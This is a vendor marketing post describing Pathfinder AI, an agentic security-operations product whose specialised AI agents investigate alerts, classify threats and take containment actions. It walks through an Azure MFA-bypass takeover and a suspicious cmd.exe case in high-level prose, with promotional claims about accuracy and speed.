Pathfinder AI Deep Dive: How Agentic AI Transforms Security Operations

Beyond Automation: AI-Driven Autonomous Investigations

Traditional security operations struggle with manual investigations, fragmented workflows, and alert fatigue. Security teams waste valuable time correlating information across tools, chasing false positives, and navigating complex investigative paths.

Pathfinder AI changes this paradigm—delivering fully autonomous threat investigation and response through Agentic AI. Unlike conventional automation, Agentic AI deploys a network of specialized AI agents that:

• Independently investigate, enrich, and correlate security data.
• Prioritize threats dynamically, filtering out noise.
• Generate full attack narratives to reduce manual workload.
• Automate response actions or provide clear recommendations for analysts.

This approach enables security teams to move beyond reactive security operations and toward proactive, AI-driven security management.

To see a deep dive of Pathfinder AI, watch the webinar.

How Pathfinder AI Conducts Autonomous Investigations

Step 1: Alert Trigger and Investigation Orchestration

Step 2: Specialized AI Agents Perform Targeted Investigations

Every alert detected by Hunters SOC Platform triggers the deployment of the Investigation Orchestration Agent. This central agent determines the appropriate investigation steps and orchestrates specialized AI agents to analyze different aspects of the potential threat.

• The Investigation Orchestration Agent evaluates the alert’s context—determining whether it relates to credential misuse, lateral movement, or other attack types.
• It creates an investigation plan, breaking the threat into multiple specialized investigation tracks.
• It deploys domain-specific AI agents, each focused on a particular security domain.

To ensure a thorough analysis, the Investigation Orchestration Agent assigns domain-specific AI agents, which operate autonomously to collect, analyze, and correlate security signals.

Examples of domain-specific agents:

• Network Investigation Agent – Conducts API calls and SQL searches to analyze traffic anomalies, unauthorized access attempts, and suspicious outbound communications.
• Cloud Investigation Agent – Retrieves cloud activity logs, permission changes, and security group modifications to detect identity compromise or privilege escalations.
• Identity Investigation Agent – Examines authentication data, user behavior anomalies, and access patterns to identify unauthorized account activity.
• Threat Intelligence Agent – Correlates observed activity with known malicious indicators from external threat intelligence feeds.
• Endpoint Investigation Agent – Analyzes process executions, file modifications, registry changes, and command line activity for potential attacker behaviors.

This is not an exhaustive list—additional agents can be deployed based on the organization’s needs and evolving threat landscape.

Step 3: Threat Classification and Conclusion

Once the domain-specific agents complete their investigations, the Investigation Orchestration Agent evaluates their findings and determines the nature of the detected activity. Possible conclusions include, but are not limited to:

• Confirmed security threat requiring immediate attention (true positive).
• Benign event mistakenly flagged as a threat (false positive).
• Simulated attack conducted by an internal security team (red team activity).
• Legitimate action performed by an authorized user or system.

If the agent identifies new findings during the investigation that require further examination, it dynamically generates an updated investigation plan and redeploys relevant domain-specific agents to analyze the newly uncovered data. This adaptive and iterative approach ensures greater accuracy, minimizes false positives, and guarantees that security teams focus only on real, high-risk threats.

Step 4: Response Execution or Detection Optimization

If a threat is confirmed, Pathfinder AI takes action:

• Develops a response plan, generating remediation steps based on the attack’s context.
• Activates domain-specific AI agents to execute containment and mitigation actions—either autonomously or with analyst approval.
• If an alert is deemed benign, Pathfinder AI automatically fine-tunes detections, improving future accuracy and minimizing unnecessary escalations.

This continuous learning capability strengthens security posture over time, ensuring that detection models remain effective against evolving threats.

Video demonstration of how investigation results are delivered to the user and how they take action based on those results.

Pathfinder AI in Action: Real World Use Cases

Use Case 1: Detecting MFA Bypass and Persistent Access in Azure

Attack Scenario:

An attacker gains access to John’s credentials and bypasses MFA using a legacy protocol (IMAP). Once inside, they create a persistent service principal key, ensuring continued unauthorized access to Azure resources, even if John’s password is changed.

Step 1: Investigation Orchestration

• Investigation Orchestration Agent detects suspicious authentication via IMAP, triggering an identity compromise investigation.
• An investigation plan is generated to analyze account activity, cloud modifications, and network behavior.

Step 2: Domain-Specific AI Agents Perform Deep Investigations

• Identity Investigation Agent:
  
  
  • Queries authentication logs for unusual login behavior.
  • Compares current login IP, geolocation, and device fingerprint against historical patterns.
  • Findings: Detects anomalous login from Montenegro, deviating from John’s usual Colorado-based access pattern.
    
    
• Cloud Investigation Agent:
  
  
  • Scans Azure logs for newly created service principals.
  • Reviews permission escalations and key assignments.
  • Findings: Flags a new persistent Azure service principal key—anomalous activity immediately following the suspicious login.
    
    
• Network Investigation Agent:
  
  
  • Monitors outbound traffic patterns for data exfiltration attempts.
  • Scans for connections to known malicious infrastructure.
  • Findings: Detects a brief spike in outbound traffic, but destination matches an internal backup service. No data exfiltration observed.

Step 3: Correlation and Confirmation

• Pathfinder AI correlates key findings:
  • IMAP login from an unusual location.
  • Creation of persistent service principal key.
  • No immediate signs of data theft.
• The system classifies the event as a high-confidence account takeover.

Step 4: Automated Response

• Revokes John’s Azure session.
• Forces a password reset and enforces modern authentication.
• Disables the newly created service principal key to eliminate persistence.

This entire workflow is conducted without manual analyst intervention, accelerating response time while eliminating false positives.

Use Case 2: Investigating Suspicious Command Execution

Attack Scenario:

A security analyst receives an alert regarding cmd.exe execution on a high-privilege system. The command appears obfuscated and may indicate stealthy attacker activity.

Step 1: Automated Investigation

Investigation Orchestration Agent detects suspicious command execution and initiates endpoint, network, and forensic analysis.

Step 2: AI-Driven Analysis

Endpoint Investigation Agent:

• Breaks down the executed command, identifying parameters and execution paths
• Flags attempts to redirect output to a remote share and self-delete—a common anti-forensic technique.
  

Threat Intelligence Agent:

• Matches observed behavior with known attack techniques from threat databases.
• Confirms strong alignment with adversary tactics used in recent incidents.

Network Investigation Agent:

• Scans for recent unusual outbound connections.
• Findings: Detects communication with an unclassified but non-malicious IP, ruling out exfiltration.
  

Step 3: Analyst Assistance & Guided Response

• Pathfinder AI summarizes findings, ensuring analysts understand the threat’s full context.
• Generates an automation response plan which includes immediate containment actions, preventing further compromise.
  

Why Pathfinder AI is a Game-Changer

Pathfinder AI automates and accelerates security investigations, allowing SOC teams to:

• Reduce investigation time from hours to minutes.
• Minimize false positives while improving detection accuracy.
• Automatically adapt to evolving threats.

As AI-driven security operations continue to evolve, Pathfinder AI ensures security teams stay ahead—operating faster, smarter, and more effectively than ever before. To see Pathfinder AI in action, watch the webinar. Learn more about this exciting launch by reading the press release which was covered by CSOonline.com, securityboulevard.com, hacker noon, marketwatch.com and more.